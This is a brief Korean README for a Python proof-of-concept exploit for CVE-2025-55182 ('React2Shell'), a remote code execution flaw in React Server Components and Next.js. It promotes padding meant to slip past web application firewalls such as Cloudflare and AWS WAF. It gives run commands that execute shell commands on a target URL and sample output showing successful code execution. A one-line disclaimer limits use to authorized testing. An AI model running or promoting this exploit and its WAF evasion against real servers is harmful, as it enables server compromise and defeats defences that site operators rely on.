
CVE-2025-55182 (React2Shell) RCE에 대한 Python PoC - Next.js/React Server Components에서 승인된 보안 테스트를 위한 동적 WAF 우회 패딩 포함.
CVE-2025-55182(일명 React2Shell)를 위한 깔끔하고 신뢰할 수 있는 Python 개념 증명 익스플로잇입니다. 이는 Next.js(App Router) 및 유사 프레임워크에서 사용되는 React Server Components의 중요 원격 코드 실행 취약점입니다.
이 PoC는 대규모 멀티파트 본문의 심층 검사를 제한하는 일반적인 웹 애플리케이션 방화벽(Cloudflare, AWS WAF 등)을 우회하기 위한 동적 WAF 우회 패딩을 포함합니다.
requests 라이브러리pip install requests
python poc.py https://vulnerable-target.com "id"
python poc.py https://vulnerable-target.com "whoami" 256
[*] Sending payload to https://vulnerable-target.com with 256KB padding...
[*] Command: id
[+] RCE Successful! Output:
uid=1000(node) gid=1000(node) groups=1000(node),4(adm),27(sudo)
이 도구는 승인된 보안 테스트 및 연구용입니다.